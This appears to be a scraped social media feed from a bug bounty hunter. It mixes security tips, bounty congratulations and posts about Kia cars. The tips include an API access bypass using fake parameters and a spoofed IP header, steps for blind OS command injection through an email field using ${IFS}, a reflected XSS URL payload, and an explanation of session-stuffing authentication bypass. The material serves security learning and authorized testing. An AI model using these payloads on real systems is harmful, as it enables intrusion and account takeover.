Amit Kumar 🇮🇳

Exploiting SQL injection vulnerabilities 👾💥 👨‍💻 Ayoub // Intigriti 🔗 intigriti.com/researchers/bl…

🔥api restriction bypass using fake parameter☠️ /api/public => unauthorized /api/public/latest?anything=/api/public => 200ok you can FUZZ like: ?admin=true, ?bypass=1, debug=true, OR add header “X-Custom-IP-Authorization: 127.0.0.1” Join my telegram t.me/ShellSec

@HarshDRanjan1 @Hacker0x01 Congrats bhai

Yay, I was awarded a $5,000 bounty on @Hacker0x01! hackerone.com/harshdranjan #TogetherWeHitHarder All thanks to my dear 🫶🏻

Want to find more vulnerabilities using BurpSuite match & replace rules? 🤑 Open this thread! 🧵 👇

@hackerspider1 @KiaInd @Apple @Tesla Totally agree. 💯 For me, @KiaInd stands out as the best option in this price segment in India. Premium features, strong quality, and real value for money. My 2022 Kia Carens has already done 42,000 km and I still don’t regret choosing it for a second.

Hi @KiaInd 👋 I own a 2021 Seltos DCT GTX+ driven just 25k km and still in love with it. I’m not a car enthusiast… I’m a tech enthusiast. That’s why the new Seltos with ADAS + Digital Key 2 (especially the @Apple integration) love it. @Tesla is the dream, sure… but ₹70–80L dreams are different level in India 🥲 Meanwhile Kia is out here bringing serious tech to real people. Respect for that. Now the only obstacle between me and the new Seltos? My mom. She said: “Car chal rahi hai na? Then why upgrade?” She’s the real CEO at home. So @KiaInd… Should I listen to her… or should I listen to innovation? 😅 maybe help me win this argument at home. Is there any smart upgrade/trade option for me that won’t hit the wallet too hard?

🔓 WP Security Pentesting Guide. From basic recon to advanced exploits. For testers & devs. Guide: github.com/amitlttwo/Hack… @HarshDRanjan1 #WordPressSecurity #Pentesting #BugBounty #bugbountytips #hacking #CyberSecurity #InfoSec #IT #xss #rce #sqli #ssrf #idor

Agreed @HarshDRanjan1

@3ncryptSaan @Bugcrowd Congrats bro!!!

Although I’m not posting bounties, this one is special. Chained a p3 Idor to P1. I earned $10,000 for my submission on @bugcrowd bugcrowd.com/h/{id: "3ncryptsaan"} #ItTakesACrowd

💀RCE in mail☠️ In Login/register page: 1. Insert a normal mail and intercept on burp 2. Replace the mail to OS command payload 3. Don't use space in the payload 4. Replace space to ${IFS} 5. Try blind OS injection using burp collab URL Join my telegram t.me/ShellSec

The bug bounty rollercoaster I reported : 🔓 Critical data leak (15,000+ records) – No reply 🎯 5 Reflected XSS findings – All marked duplicate 🔄 SSRF with internal access – No reply Hunt continues! Consistency > instant wins. #xss #bugbountytips #InfoSec #ssrf #Hacking

DAY 1: Found R XSS via iconURL parameter 🕵️💰 https://Redacted/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E Portal: Marketplace manager Bug: Reflected XSS #XSS #BugBounty #WebSecurity #Hacking #InfoSec

Doc: docs.google.com/document/d/1pD… #bugbounty #infosec #cybersecurity #bugbountytips #hackers

x 6/6 Summary: Recon is multi-layered (JS → JSON → API → Roles). Stay in one program longer. Test every path, every role. Forgotten dev files & legacy endpoints still pay big. Consistency beats talent. Day 1 is today. #bugbounty #infosec #cybersecurity #bugbountytips #hackers

x 1/6 Back with 5 hard-earned #bugbounty lessons after vanishing for a while: Pivot, don’t quit. Bored of the main web app? Switch to API → Docs → Mobile app of the same target. Depth beats breadth. #infosec #bugbountyhunting #cybersecurity

After vanishing from the scene, I'm officially back on the bug bounty grind. 🔓 Day 1 starts NOW. ⌚ 10 AM - 7 PM: 10-2 PM: Deep Learning 2-3 PM: Break 3-7 PM: Active Hunting Consistency is the key. The journey begins again. #BugBounty #CyberSecurity #HackTheBox #infosec #Day1

Lets learn Auth Bypass via Session Stuffing! Easy P1s to find if the target is susceptible. Ok, so what's "Session Stuffing"? In the wonderful land of server-side code, developers can use session variables to store information. These variables can be things like your username, your user id, your preferred pickup location for groceries, really anything. These variables are stored server side only, so in general, some action triggers creating or changing them. Imagine we have a variable scope called "session" (that stores the session variables). So we may have a "session.userId" and "session.userName" and "session.idLoggedIn". Login Dialogue When you enter the correct username and password on a login screen, the server could decide it wants to store your user name, and the fact that you are logged in. So server code may say "if session.isLoggedIn = true, do some lookup using session.userName". You with me? Forgot Password Nobody that is already logged in would need to hit a forgot password screen right? So devs don't necessarily think of this use case. But imagine you open the forgot password screen intended for unauthenticated visitors, after already having logged in. Lets say the forgot password box asks for your username, so it can send you a password reset link or ask you a password reset question. It needs to know if you have an account first. It temporarily sets session.userName to whatever you type in. Lets stuff this puppy So what happens if we login to bobs account? Server sets: session.isLoggedIn = true session.userName = bob Now while still logged in, we pivot to the 'forgot password' tab. We key in username "tina". Server temporarily sets session.userName = "tina" to pull back password reset questions. Back on bobs account page, I now hit refresh, and I'm now logged in and see all of Tinas information, and actually have become Tina. What happened here? The doofus devs used the same session variable for forgot password and login dialogues and did not force logout when utilizing password reset. So one page stuffs/replaces a variable in an already authenticated session, resulting in a total auth bypass for anyone else's account via username only. Result? I've done this on some Fortune 10 websites, some banking software used by 1000s of banks, and on some electric utilities (all with permission). In the case of the online banking software, it was absolutely terrifying that something this dumb could have led to many, many millions in theft. Make sure to test for dumb stuff like this! And people say hacking is hard... 😜 #CyberSecurity #infosec #bugbounty #Hacking